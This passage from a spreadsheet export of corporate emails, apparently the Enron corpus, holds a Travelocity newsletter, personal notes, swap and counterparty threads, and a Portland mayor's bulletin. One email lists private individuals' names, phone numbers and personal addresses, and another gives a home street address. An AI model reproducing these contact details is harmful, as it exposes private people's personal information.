Traveler Reviews. _x000D_
_x000D_
Travelocity Store_x000D_
Bringing along the right travel gear makes a trip more comfortable, _x000D_
safe, and enjoyable. Our travel store offers a broad range of quality _x000D_
luggage and useful travel accessories for your next vacation or _x000D_
business trip. Shop now with an online company you know and _x000D_
trust--Travelocity.com. _x000D_
_x000D_
_x000D_
***FARE WATCHER*** _x000D_
Fare Watcher_x000D_
Keep track of changes in airfares to your favorite cities with Fare _x000D_
Watcher! Tell us the cities you're interested in, how long you want _x000D_
to track them, and how you want to be notified. Fare Watcher will do _x000D_
the rest! _x000D_
_x000D_
_x000D_
***FEATURED THIS WEEK***_x000D_
Rates from $599 on Eastern and Western Caribbean Cruises!_x000D_
Take off on the incredible Carnival Triumph for a fun-filled 7-night _x000D_
voyage at great rates! In the Eastern Caribbean you'll visit Puerto _x000D_
Rico and the Virgin Islands, while Cozumel, Jamaica, and Grand Cayman _x000D_
await you in the Western Caribbean. Great rates like these don't last _x000D_
for long, so book now! _x000D_
_x000D_
Win a Night on the Town for Six with Travelocity Preferred Traveler_x000D_
Become a Travelocity Preferred Traveler and you'll get a chance to _x000D_
take a limousine ride around town, enjoy a dinner for six, and get _x000D_
six FREE Preferred Traveler Elite memberships. Enroll now and treat _x000D_
five of your friends to a great night out! _x000D_
_x000D_
_x000D_
***VACATIONS***_x000D_
7th Night FREE at Sheraton Grand Resort in Nassau!_x000D_
Stop procrastinating and take that vacation you've always dreamed of! _x000D_
Sheraton Grand Resort is offering the 7th night FREE! _x000D_
_x000D_
5th Night FREE at the Pacific Beach in Oahu!_x000D_
Escape to Oahu! Enjoy the tropical weather and the beautiful Waikiki _x000D_
Beach with the 5th night FREE! _x000D_
_x000D_
_x000D_
***CRUISES***_x000D_
Balcony Staterooms on Weeklong Southern Caribbean Sailings from $747!_x000D_
Settle in to your very own luxurious balcony stateroom this fall and _x000D_
enjoy sweeping ocean views for as little as $747! Celebrity Cruises _x000D_
wants you to enjoy a blissful retreat after exploring a host of _x000D_
colorful ports, including St. Lucia, Antigua, Barbados, and beyond. _x000D_
Balcony rates don't get any lower than this, so book now!_x000D_
_x000D_
Sail to Bermuda from Boston for Only $549!_x000D_
Follow the sun to find the warm weather and pink-sand beaches of _x000D_
Bermuda on this weeklong itinerary. For less than $80 per day, per _x000D_
person, you can set out to find the best that Bermuda has to offer, _x000D_
including cricket matches, high tea, and all things English. _x000D_
Book now!_x000D_
_x000D_
12-Night Sailings through Northern Europe from $899!_x000D_
For as little as $75 per night, per person, Norwegian Cruise Line has _x000D_
just the vacation for you. Berlin, Stockholm, Copenhagen, and more _x000D_
await you on this Baltic Capitals cruise. How else can you see so _x000D_
much of Europe for so little money? Book now!_x000D_
_x000D_
_x000D_
***HOTELS***_x000D_
Courtyard by Marriott_x000D_
Why start your adventures on an empty stomach? At Marriott Courtyard, _x000D_
enjoy a weekend stay that includes a delicious hot and cold breakfast _x000D_
buffet. Find out more about our Breakfast LoversSM Special. _x000D_
_x000D_
Hotel Pennsylvania_x000D_
New York's Hotel Pennsylvania. In the heart of Manhattan, opposite _x000D_
Madison Square Gardens and Macy's. $159.95*, newly renovated room _x000D_
on our executive floor, free continental breakfast per person. Ask _x000D_
for code TVL1.*rate excludes taxes or gratuities. Book Now!_x000D_
_x000D_
Renaissance World Gate_x000D_
Exclusive Offer for Travelocity Members Only! Take advantage of this _x000D_
special offer from the Renaissance Worldgate Hotel in Orlando, _x000D_
Florida: $75 room rate now through June 2, 2001 or $80 from June 3 _x000D_
through September 3, 2001. _x000D_
_x000D_
_x000D_
***AIR***_x000D_
Fly Aeromexico, Mexicana or Aero California and Put Plenty of Pesos _x000D_
in the Bank!_x000D_
Aeromexico, Mexicana, and Aero California Airlines are offering big _x000D_
savings to many destinations in Mexico! With fares this low, you'll _x000D_
be able to use your savings to take advantage of everything Mexico _x000D_
has to offer, from world-famous beaches to cultural treasures. Just _x000D_
book your ticket by May 20, 2001 and complete your travel by _x000D_
August 31, 2001. _x000D_
_x000D_
Travel on National Airlines and Save up to 15%_x000D_
Fly National Airlines from Los Angeles or San Francisco to either _x000D_
Chicago, Miami, or Washington, D.C. and save 15 percent on National's _x000D_
already-low prices. These fares are valid from May 1, 2001 through _x000D_
August 31, 2001. Tickets must be purchased by May 20, 2001. _x000D_
_x000D_
Save Big on Your Next Flight to Canada!_x000D_
Fly Air Canada from the U.S. to Canada and take advantage of great _x000D_
sale fares! Visit Toronto, Montreal, Vancouver, or one of 14 other _x000D_
destinations and enjoy Air Canada's superior service along the way. _x000D_
Purchase your tickets by May 30, 2001 and complete your travel by _x000D_
December 31, 2001 to take advantage of everything Canada has _x000D_
to offer. _x000D_
_x000D_
_x000D_
***CAR***_x000D_
Hit the road and save 15% on weekly or weekend rates from Budget _x000D_
Rent-a-Car! This offer is valid at participating locations now through _x000D_
December 31, 2001. A one-day advance reservation is required. _x000D_
_x000D_
_x000D_
***SPECIAL OFFERS***_x000D_
Hawaii. It might appear only in your dreams. The captivating _x000D_
rainbows, lush tropics, and warm Hawaiian hospitality are truly a _x000D_
reality. Plan your ultimate vacation to HAWAII today--the "Islands of _x000D_
Aloha" await you! Enjoy special offers from Hawaiian Airlines, Hilton _x000D_
Resorts Hawaii, and The Outrigger Hotels and Resorts. _x000D_
_x000D_
Goodbye taxi lines. Goodbye shuttle buses. Say hello to _x000D_
Limocenter.com. You can arrange for Chauffeured Ground Transportation _x000D_
Service anywhere you may be traveling. Book now and save 50 percent _x000D_
on the second leg of your trip! _x000D_
_x000D_
_x000D_
***EXCLUSIVE OFFER***_x000D_
Travelocity World MasterCardc_x000D_
Earn Travelocity Rewards with each dollar you spend. And, with as _x000D_
little as 8,000 points, you'll be on your way to enjoying discounts _x000D_
and free travel on your Travelocity purchases. You'll earn $100 for _x000D_
every 8,000 points that can be used for airline tickets, rental cars, _x000D_
and hotel reservations. Apply today and earn 4,000 bonus points when _x000D_
you make your first transaction. _x000D_
_x000D_
_x000D_
***DEALS AND REWARDS***_x000D_
Travel Savings with the Travelocity Preferred Traveler Program_x000D_
Sign up and receive exclusive savings including: 5% off Travelocity _x000D_
GoodBuy Fares, $25 cash back at Best Western Hotels, Alamo car-rental _x000D_
upgrades, Two-category cabin upgrades with Carnival Cruises, up to _x000D_
20% off at 7,000 restaurants nationwide, and much, much more. Get a _x000D_
free weekender bag AND a chance to Win a Night on the Town when you _x000D_
become a Travelocity Preferred Traveler. Enroll now!_x000D_
_x000D_
_x000D_
***SITE NEWS***_x000D_
Your Vote Counts!_x000D_
We're talking, of course, about your vote in the fifth annual Webby _x000D_
Awards. Travelocity has been nominated in the category of best _x000D_
e-commerce site. We know that with Travelocity's great prices, _x000D_
ease-of-use, and friendly customer service, the choice is a _x000D_
no-brainer. But it's not up to us--it's up to you, the loyal users _x000D_
who have made us the most popular! Click here to visit the Webby _x000D_
Awards site and cast your vote today! _x000D_
_x000D_
FREE Issue of Travelocity Magazine!_x000D_
Explore exotic destinations and discover intriguing travel _x000D_
information and special deals. Don't miss one issue of Travelocity _x000D_
Magazine--get yours FREE!_x000D_
_x000D_
_x000D_
********* NEWS FROM OUR SPONSORS **********_x000D_
RETIRE OVERSEAS!_x000D_
Live like royalty on $14 a day. Own an exotic beachfront getaway for _x000D_
$35,000. Enjoy fine dining for $7 a person. Employ a maid or gardener _x000D_
for $2 a day. Click here for more details! _x000D_
_x000D_
TravelTex_x000D_
Even the vacations are bigger in Texas. To start planning your next _x000D_
Lone Star adventure visit www.TravelTex.com. _x000D_
_x000D_
_x000D_
*Fares shown are for one adult and are subject to additional charges, _x000D_
including, but not limited to, Passenger Facility Charges (ranging _x000D_
from $2-$18), Federal Segment Fees of $2.75 per segment (defined as a _x000D_
takeoff and a landing), and taxes/fees associated with international _x000D_
itineraries up to $113. Fuel surcharges, if applicable, are included _x000D_
in the fares listed. _x000D_
_x000D_
Total fare per passenger, including all charges, will always be _x000D_
displayed to you prior to final ticket purchase. Please note that _x000D_
fares are subject to restrictions, may not be available on all _x000D_
flights, and may change without notice. For detailed descriptions of _x000D_
the fare rules, click on the corresponding rules link._x000D_
_x000D_
_x000D_
Happy Travels! _x000D_
_x000D_
The Travelocity.com Team _x000D_
Go Virtually Anywhere! _x000D_
travelocity.com_x000D_
_x000D_
UNSUBSCRIBE _x000D_
When you registered at Travelocity or Preview Travel, you agreed to _x000D_
receive e-mail. If you would like to change your subscription _x000D_
preferences or if you received this message in error, please _x000D_
click below: _x000D_
http://travelocity1.m0.net/m/u/tty/t2.asp?e=jtholt%40ect.enron.com_x000D_
_x000D_
FORGOT YOUR PASSWORD? _x000D_
Password look-up--follow this link and we'll help you retrieve _x000D_
your password: _x000D_
http://travelocity1.m0.net/m/s.asp?HB3671096336X815302X63982X_x000D_
_x000D_
HOW DO I UPDATE MY E-MAIL? _x000D_
You may update your e-mail address within Your Account Preferences. _x000D_
Simply click on "Your Account" at the top of the home page and log in. _x000D_
http://travelocity1.m0.net/m/s.asp?HB3671096336X815303X63982X_x000D_
_x000D_
Travelocityc and Travelocity.com are trademarks of Travelocity.com LP _x000D_
and Sabrec is a trademark of an affiliate of Sabre Inc., 2000 _x000D_
Travelocity.com LP. All rights reserved. WB/WS _x000D_
#280 CST#2050374-40 _x000D_
_x000D_
_x000D_
_x000D_
 </t>
  </si>
  <si>
    <t>Tue, 3 Oct 2000 03:57:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'hjackson@swcbc.net'})</t>
  </si>
  <si>
    <t>Re:Good morning!</t>
  </si>
  <si>
    <t>How are you?  Hope everything is going well.  Did you receive my response to _x000D_
your last e-mail?  I wasn't sure if it transmitted or not.  Nothing new going _x000D_
on here.  I have a week of vacation scheduled for the week of October 16th.  _x000D_
I really haven't made any plans, but maybe we'll go visit my family in _x000D_
Omaha.  It's really hard for me to plan, b/c I may have to work some of the _x000D_
week.  I'm not sure yet, so I hate to plan a vacation that may have to be _x000D_
interrupted._x000D_
_x000D_
Church services were  really good this past sunday, Pastor preached a good _x000D_
sermon.  _x000D_
_x000D_
Talk with you later</t>
  </si>
  <si>
    <t>Wed, 6 Feb 2002 10:56:18 -0800 (PST)</t>
  </si>
  <si>
    <t>_x000D_
_x000D_
Start Date: 2/6/02; HourAhead hour: 13;  HourAhead schedule download failed. Manual intervention required.</t>
  </si>
  <si>
    <t>Mon, 9 Apr 2001 08:00:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'joan.quick@enron.com', 'christopher.clark@enron.com', 'brian.redmond@enron.com', 'gerald.nemec@enron.com', 'nick.cocavessis@enron.com', 'rusty.belflower@enron.com', 'walt.hamilton@enron.com', 'mark.castiglione@enron.com', 'david.owen@enron.com', 'teresa.bushman@enron.com', 'barbara.gray@enron.com', 'arvel.martin@enron.com', 'becky.caudle@enron.com', 'don.rollins@enron.com', 'mark.whitt@enron.com'})</t>
  </si>
  <si>
    <t>Canceled: Crescendo Status Meeting</t>
  </si>
  <si>
    <t xml:space="preserve">When: Tuesday, April 10, 2001 10:00 AM-11:00 AM (GMT-06:00) Central Time (US _x000D_
&amp; Canada)._x000D_
Where: EB3335_x000D_
_x000D_
*~*~*~*~*~*~*~*~*~*_x000D_
</t>
  </si>
  <si>
    <t>Mon, 4 Jun 2001 13:22:19 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'lydecker.jr.@enron.com'})</t>
  </si>
  <si>
    <t>Special Assets</t>
  </si>
  <si>
    <t xml:space="preserve">John, I had lunch with Kevin and I'm 100% on board with the concept and the=_x000D_
 chance for an expanded scope for Special Assets under an Enron Corp. umbre=_x000D_
lla.  I think I will work well with Kevin.  I am sorry to leave ENA though.=_x000D_
  I am sincere in complimenting you and Louise on the progress you are maki=_x000D_
ng in a short time period._x000D_
_x000D_
As I mentioned this morning I had scheduled a Wednesday meeting to brief yo=_x000D_
u on a new business idea for Special Assets...Enron Executive Services.  Gi=_x000D_
ven this change and the demands upon your schedule you may prefer not to pr=_x000D_
oceed with this session--although I will send you the presentation in any e=_x000D_
vent.  There is one issue, however,  that I need some guidance and perhaps =_x000D_
your help.  Next week we will be in Spain meeting with governmental and pro=_x000D_
vincial development agencies exploring the feasbility of providing services=_x000D_
 (on a fee basis) for evaluating and preparing projects for presentation to=_x000D_
 developers and capital providers.  Stature and titles tend to be important=_x000D_
 in these international relationship introductions.  In other companies bef=_x000D_
ore coming to Enron what I've done in these cases is set up a shell company=_x000D_
 and assign senior officer titles to the members of that project.  We sugge=_x000D_
sted this to legal, i.e. a shell company with no assets, who have indicated=_x000D_
 someone would need to approve using a non-standard officer slate.  Is this=_x000D_
 something you can approve?  Thanks.  Dick. </t>
  </si>
  <si>
    <t>Mon, 21 Aug 2000 08:44:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'johnathan_dazey@gensler.com'})</t>
  </si>
  <si>
    <t>Re: Seal PT "enlistees"</t>
  </si>
  <si>
    <t xml:space="preserve">Please note changes below for Jeff and Jeffrey Skilling._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
"Johnathan Dazey_HO" &lt;johnathan_dazey@gensler.com&gt; on 08/21/2000 01:29:51 PM_x000D_
To: jack@sealptcourse.com_x000D_
cc: johnathan_dazey@gensler.com, jmgrover@dainrauscher.com, _x000D_
may_holiday@msn.com, kelleyc86@hotmail.com, marlenep0606@aol.com, _x000D_
g.koutani@aol.com, rpiper@tuckeralan.com, dsmorris@e-seis.com, _x000D_
scrapmet@ix.netcom.com, scrippa@petris.com, jeff.skilling@enron.com, _x000D_
jks1205@aol.com, janet_sutton@gensler.com, mypaco99@yahoo, _x000D_
mtschen@hotmail.com, cc1813@evl.net _x000D_
_x000D_
Subject: Seal PT "enlistees"_x000D_
_x000D_
_x000D_
The following is a list of participant names, phone numbers, &amp; e-mail_x000D_
addresses from today's first session._x000D_
Please review for correctness/completeness and reply to John Dazey ..._x000D_
ASAP!_x000D_
_x000D_
Thanks Troops!!!!!_x000D_
_x000D_
_x000D_
Johnathan Dazey 713-861-0271  johnathan_dazey@gensler.com_x000D_
_x000D_
John Grover  713-651-3334  jmgrover@dainrauscher.com_x000D_
_x000D_
Cynthia Holliday 713-355-1442  may_holiday@msn.com_x000D_
_x000D_
Chris Kelley  713-984-0237  kelleyc86@hotmail.com_x000D_
_x000D_
George Koutani ?   g.koutani@aol.com_x000D_
_x000D_
Dan Morris  713-869-0110  dsmorris@e-seis.com_x000D_
_x000D_
Marlene Pezzia 281-807-4271  marlenep0606@aol.com_x000D_
_x000D_
Roxanne Piper  713-651-2717  rpiper@tuckeralan.com_x000D_
_x000D_
Bryan Rosenstrauch 713-953-0145  scrapmet@ix.netcom.com_x000D_
_x000D_
Beverly Scrippa 713-869-0110  scrippa@petris.com_x000D_
_x000D_
Jeff Skilling 713-529-7727   jeff.skilling@enron.com_x000D_
_x000D_
Jeffrey Skilling 713-529-7727    jks1205@aol.com_x000D_
(note correct spelling of "Jeffrey"_x000D_
_x000D_
Janet Sutton  713-862-7528  janet_sutton@gensler.com_x000D_
_x000D_
Paco   ?   mypaco99@yahoo_x000D_
_x000D_
?   ?   mtschen@hotmail.com_x000D_
_x000D_
?   ?   cc1813@evl.net_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Johnathan Dazey_x000D_
Gensler Houston_x000D_
Penzoil Place 700 Milam Street, Suite 400_x000D_
Houston, Texas 77002_x000D_
v-713-844-0119_x000D_
f-713-224-6259_x000D_
_x000D_
johnathan_dazey@gensler.com_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 24 Aug 2001 05:55:46 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'erik_benke@hotmail.com'})</t>
  </si>
  <si>
    <t>Don,_x000D_
Thanks for taking the time to interview me today.  I'm excited about the_x000D_
opportunity to work in power trading at Enron.  I'm impressed with what I've_x000D_
seen and the people I've met during my two visits.  Let me know if you have_x000D_
any more questions._x000D_
Thanks,_x000D_
Erik_x000D_
_x000D_
__________________________________________________________________x000D_
Get your FREE download of MSN Explorer at http://explorer.msn.com/intl.asp</t>
  </si>
  <si>
    <t>Wed, 24 Oct 2001 00:21:24 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'disneystore@disneyonline.go.com'})</t>
  </si>
  <si>
    <t>frozenset({'tgeacco@enron.com'})</t>
  </si>
  <si>
    <t>Over 300 NEW Holiday Items!</t>
  </si>
  <si>
    <t>Once upon a time in a Magic land, a Christmas celebration was held. Mickey, Minnie and all their friends were gathered together to share their favorite holiday stories. Join the celebration as the Magic of a Disney Christmas fills the air. _x000D_
_x000D_
We've got a great selection of Disney gifts for everyone on your list. So, act now and finish your holiday shopping early this year with the help of Mickey, Minnie, Pooh, and all their friends! _x000D_
_x000D_
Deck your Halls, Disney style! Only at DisneyStore.com_x000D_
http://go-disneystore.com/find/10237a_x000D_
_x000D_
_x000D_
P.S. We even have personalized ornaments this year, but making them extra special takes a little more time, so order today! _x000D_
_x000D_
_x000D_
Find the Disney Store nearest you_x000D_
http://go-disneystore.com/find/10237c_x000D_
_x000D_
_x000D_
Please click on this URL for a full graphic version of this message _x000D_
http://go-disneystore.com/find/10237d_x000D_
_x000D_
_x000D_
NOTE: If you choose to unsubscribe from future DisneyStore.com e-mails, click on this URL or cut and paste it into the address bar of your browser. _x000D_
http://register.disney.go.com/unsub/tgeacco@enron.com/L5/store.html_x000D_
_x000D_
This e-mail was sent to tgeacco@enron.com._x000D_
_x000D_
(c) Disney.  All Rights Reserved.</t>
  </si>
  <si>
    <t>Wed, 16 Feb 2000 09:45:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: letter to reference credits</t>
  </si>
  <si>
    <t xml:space="preserve">I'm not sure I agree with you.  There is a big difference between listing the _x000D_
price for a reference entity's credit online (i.e. in a nearly public manner) _x000D_
vs. providing a price quote to customers who request it.  The almost public _x000D_
nature of the marketing  may influence whether or not the reference entity is _x000D_
happy with Enron trading the product.  Even if they are not affected in this _x000D_
way, having given them notice in advance will at least give us moral high _x000D_
ground if the reference entity later decides to object._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Louise Kitchen_x000D_
02/16/2000 03:49 PM_x000D_
To: Bryan Seyfried/LON/ECT@ECT_x000D_
cc: David Forster/LON/ECT@ECT, Mark Dilworth/LON/ECT@ECT, Paul _x000D_
Goddard/LON/ECT@ECT, Mark Taylor/HOU/ECT@ECT _x000D_
Subject: Re: letter to reference credits  _x000D_
_x000D_
Remove all references to EnronOnline its unnecessary in this context - _x000D_
suffice to say you will be trading through all the normal Enron methods._x000D_
_x000D_
Louise_x000D_
_x000D_
_x000D_
_x000D_
Bryan Seyfried_x000D_
16/02/2000 20:24_x000D_
To: David Forster/LON/ECT@ECT_x000D_
cc: Louise Kitchen/LON/ECT@ECT, Mark Dilworth/LON/ECT@ECT, Paul _x000D_
Goddard/LON/ECT@ECT _x000D_
_x000D_
Subject: letter to reference credits_x000D_
_x000D_
Attached is the letter that we intend to send to CFO/Treasurers of reference _x000D_
credits.  The section on EnronOnline was recommended by Sullivan and Cromwell _x000D_
and reviewed by Goddard, Dilworth and Simons._x000D_
_x000D_
_x000D_
_x000D_
There may be a few minor edits before it goes out._x000D_
_x000D_
Thanks_x000D_
_x000D_
bs_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 8 Jan 2002 13:58:57 -0800 (PST)</t>
  </si>
  <si>
    <t>Request Submitted: Access Request for phillip.m.love@enron.com</t>
  </si>
  <si>
    <t xml:space="preserve">You have received this email because you are listed as a data approver. Please click http://itcapps.corp.enron.com/srrs/auth/emailLink.asp?ID=000000000080522&amp;Page=Approval to review and act upon this request._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Request ID          : 000000000080522_x000D_
Request Create Date : 1/8/02 7:58:56 AM_x000D_
Requested For       : phillip.m.love@enron.com_x000D_
Resource Name       : Sitara Houston Production Denver Edit Risk Analytics_x000D_
Resource Type       : Applications_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 17 May 2001 02:51:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'jesus.melendrez@enron.com', 'mark.haedicke@enron.com', 'timothy.detmering@enron.com', 'jeff.donahue@enron.com', 'raymond.bowen@enron.com', 'rick.buy@enron.com', 'jeffrey.sherrick@enron.com', 'craig.fox@enron.com'})</t>
  </si>
  <si>
    <t>FW: Special Board Meeting Notice</t>
  </si>
  <si>
    <t xml:space="preserve"> -----Original Message-----_x000D_
From:  "Cagle, Donna" &lt;DCAGLE@mariner-energy.com&gt;@ENRON _x000D_
[mailto:IMCEANOTES-+22Cagle+2C+20Donna+22+20+3CDCAGLE+40mariner-energy+2Ecom+3_x000D_
E+40ENRON@ENRON.com] _x000D_
Sent: Thursday, May 17, 2001 9:32 AM_x000D_
To: Edison, Deborah J.; Melendrez, Jesus_x000D_
Subject: Special Board Meeting Notice_x000D_
_x000D_
Please distribute.  Thank you._x000D_
_x000D_
Donna_x000D_
_x000D_
 &lt;&lt;Mtg. Notice to BOD - Special.doc&gt;&gt;_x000D_
_x000D_
 - Mtg. Notice to BOD - Special.doc</t>
  </si>
  <si>
    <t>Thu, 1 Jun 2000 10:13:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Tue, 30 Oct 2001 12:08:35 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'lhazzard@firstam.com'})</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
Will you send me copies of those pictures?  My address is 2505 NE 32nd Place_x000D_
Portland, OR 97212.  I really am sorry to hear about your job situation, I_x000D_
hope it all works out.  I wish you were here._x000D_
_x000D_
I miss you,_x000D_
Laurel</t>
  </si>
  <si>
    <t>Wed, 2 Feb 2000 07:17:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'randy.rice@enron.com'})</t>
  </si>
  <si>
    <t>We would like to discuss the proposal for electric service and our_x000D_
 recommendations for negotiations strategies with Ninnescah Electric for the_x000D_
 Cunningham Storage facility.</t>
  </si>
  <si>
    <t>Once everyone (you or an approved designate) is ok with the date and time, I _x000D_
will communicate a conference call number to be used. We are prepared to move _x000D_
forwarded and bring this issue to closure and wanted to make sure you were in _x000D_
the loop.</t>
  </si>
  <si>
    <t>Fri, 15 Sep 2000 05:27:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'grosenbl@exchange.ml.com'})</t>
  </si>
  <si>
    <t>Re: Swap Agreement</t>
  </si>
  <si>
    <t xml:space="preserve">Gary:  Thanks for the redraft.  Would you please send the swap termination _x000D_
format for the Transaction so that I can review it together with the _x000D_
Transaction confirm?  Thanks.  Sara_x000D_
_x000D_
_x000D_
_x000D_
	"Rosenblum, Gary(CICG-GEDNY)" &lt;grosenbl@exchange.ml.com&gt;_x000D_
	09/14/2000 03:37 PM_x000D_
		 _x000D_
		 To: "'sara.shackleton@enron.com'" &lt;sara.shackleton@enron.com&gt;_x000D_
		 cc: "Barna, Peter (CICG - Equity Linked Capital Markets)" _x000D_
&lt;pbarna@exchange.ml.com&gt;, "Payton-Jacobs, Leslie (OGC)" _x000D_
&lt;LPayton-Jacobs@exchange.ml.com&gt;, "Grasso, Anthony (CICG - NY Equity Ops)" _x000D_
&lt;AGrasso@exchange.ml.com&gt;_x000D_
		 Subject: Swap Agreement_x000D_
_x000D_
_x000D_
Sara,_x000D_
Hope all is well by you._x000D_
Attached is a marked and clean draft of the confirmation for the Swap_x000D_
Transaction, revised to reflect our discussion on your comments. I note that_x000D_
the confirmation retains the Change in Law provision (with marked changes)_x000D_
for this Transaction. We agree to discuss further the Change in Law_x000D_
provision in respect of future Transactions. Please call/email me with any_x000D_
comments._x000D_
Regards_x000D_
 &lt;&lt;Enron swap 091400cmp.doc&gt;&gt;  &lt;&lt;Enron swap 091400.doc&gt;&gt;_x000D_
_x000D_
 - Enron swap 091400cmp.doc_x000D_
 - Enron swap 091400.doc_x000D_
</t>
  </si>
  <si>
    <t>Thu, 17 Aug 2000 04:04:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: Counterparty Approval List for 8/14/00</t>
  </si>
  <si>
    <t xml:space="preserve">Could you please help us by addressing the question posed by Stacey _x000D_
Richardson below?_x000D_
_x000D_
Thanks._x000D_
Bridgette_x000D_
---------------------- Forwarded by Bridgette Anderson/Corp/Enron on _x000D_
08/17/2000 10:54 AM ---------------------------_x000D_
_x000D_
_x000D_
Stacey Richardson@ECT_x000D_
08/17/2000 10:50 AM_x000D_
To: Bridgette Anderson/Corp/Enron@ENRON_x000D_
cc: Anthony Campos/HOU/ECT@ECT, Karen Lambert/HOU/ECT@ECT, Tana _x000D_
Jones/HOU/ECT@ECT, Frank L Davis/HOU/ECT@ECT, Stephanie Sever/HOU/ECT@ECT _x000D_
_x000D_
Subject: Re: Counterparty Approval List for 8/14/00  _x000D_
_x000D_
Can you please have Tana clarify if the counterparty wishes to have a new CP _x000D_
name set up as Northern Illinois Gas Company d/b/a Nicor Gas Company (which _x000D_
it sounds like) or if they will make financial trades under Northern Illinois _x000D_
Gas Company (since Nicor Gas Company is the physical trading entity).  We _x000D_
still cannot report (or even SET UP) the contract until we know which CP name _x000D_
is correct.  Until then, the 08/14/00 EOL report will still be outstanding._x000D_
_x000D_
Thanks,_x000D_
Stacey_x000D_
_x000D_
_x000D_
   _x000D_
	Enron North America Corp._x000D_
	_x000D_
	From:  Bridgette Anderson @ ENRON                           08/17/2000 09:29 _x000D_
AM_x000D_
	_x000D_
_x000D_
To: Stacey Richardson/HOU/ECT@ECT_x000D_
cc: Anthony Campos/HOU/ECT@ECT _x000D_
Subject: Counterparty Approval List for 8/14/00_x000D_
_x000D_
_x000D_
---------------------- Forwarded by Bridgette Anderson/Corp/Enron on _x000D_
08/17/2000 09:28 AM ---------------------------_x000D_
From: Tana Jones@ECT on 08/16/2000 05:13 PM_x000D_
To: Frank L Davis/HOU/ECT@ECT, Sheri Thomas/HOU/ECT@ECT, Stephanie _x000D_
Sever/HOU/ECT@ECT_x000D_
cc: Bridgette Anderson/Corp/Enron@ENRON _x000D_
_x000D_
Subject: Counterparty Approval List for 8/14/00_x000D_
_x000D_
With respect to the attached list, a few things:_x000D_
_x000D_
1.  With respect to Dynegy Power Marketing, my records reflect that they are _x000D_
approved for all products (including financial &amp; power).  Can you let me know _x000D_
if your approvals reflect otherwise?_x000D_
_x000D_
2.  With respect to Nicor Gas Company and Northern Illinois Gas Company:  _x000D_
Northern Illinois Gas Company should be restyled to be "Northern Illinois Gas _x000D_
Company d/b/a Nicor Gas Company".  We have just received the executed ISDA _x000D_
Master with this entity and that is how the counterparty directed us to set _x000D_
the master up.  Nicor Gas Company appears to be their physical gas trading _x000D_
arm, so that entity name should be left alone._x000D_
_x000D_
I haven't forgotten the 8/11/00 list, I am waiting to hear back from _x000D_
Australia about a question._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 17 Oct 2000 10:15:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'mayorkatz@ci.portland.or.us'})</t>
  </si>
  <si>
    <t>E-Katz: homeless/affordable housing; PURB members needed</t>
  </si>
  <si>
    <t xml:space="preserve">In light of Judge Stephen Gallagher's opinion on the City's homeless camping_x000D_
ordinance, Commissioner Sten and I have developed a comprehensive approach_x000D_
to dealing with homeless issues that includes working with private_x000D_
organizations.  Details follow below._x000D_
_x000D_
I have also included an item requesting applicants for the Public Utilities_x000D_
Review Board.  This is a board I created with former City Commissioner Mike_x000D_
Lindberg in 1993 to provide needed citizen oversight of municipal utilities._x000D_
I encourage people to consider becoming a part of this important board._x000D_
_x000D_
You are a part of my e-Katz list because of your work with me or my_x000D_
administration.  To be removed from the "e-Katz" distribution list, simply_x000D_
reply to this e-mail with your request.  If you have multiple e-mail_x000D_
addresses you use, please include a name and/or company, otherwise we may_x000D_
not be able to locate the correct entry to remove.  For more information on_x000D_
the Katz administration, visit our website at_x000D_
http://www.ci.portland.or.us/mayor._x000D_
_x000D_
_x000D_
MAYOR VERA KATZ, COMMISSIONER ERIK STEN PRESENT HOLISTIC APPROACH TO_x000D_
ADDRESSING HOMELESS ISSUES_x000D_
Reaffirming their commitment to providing safe, affordable housing while_x000D_
standing firm against homeless camping in the City of Portland, Mayor Vera_x000D_
Katz and Commissioner Erik Sten held a news conference today to announce_x000D_
their holistic approach to address homeless and housing issues.   The two_x000D_
focused on the City's ongoing efforts to preserve and create more affordable_x000D_
housing, the current tools available to continue enforcing anti-camping_x000D_
laws, and announced an expanded partnership with JOIN -- a private_x000D_
organization that does outreach to homeless people._x000D_
_x000D_
"While I am still a firm believer in the need for the anti-camping ordinance_x000D_
to prevent unsafe and unsanitary campgrounds, this has given us the_x000D_
opportunity to take a closer look at what we in the City are doing to_x000D_
provide housing and shelter opportunities for everyone," said Katz, "and_x000D_
while we've made strides meeting our affordable housing commitments, there_x000D_
is still more we can do."_x000D_
_x000D_
Katz and Commissioner Erik Sten announced their intent to follow the_x000D_
recommendation of Sten's 0-30% Housing Resources Task Force to spend $3.5_x000D_
million of the $5 million allocated for affordable housing this coming year_x000D_
on housing for those in the 0-30 percent median income range.  Over the last_x000D_
seven years, the City of Portland has committed nearly $270 million towards_x000D_
affordable housing, in addition to foregoing $10.5 million in revenue_x000D_
through tax abatements._x000D_
_x000D_
"Homelessness is an issue that should be addressed by first dealing with the_x000D_
individual at a personal level," said Commissioner Sten.  "I appreciate that_x000D_
the City is continuing to move forward on doing this with aggressive efforts_x000D_
around things such as housing and outreach services."_x000D_
_x000D_
Katz and Sten also noted recent successes in meeting affordable housing_x000D_
needs, including the Portland Development Commission's just-completed_x000D_
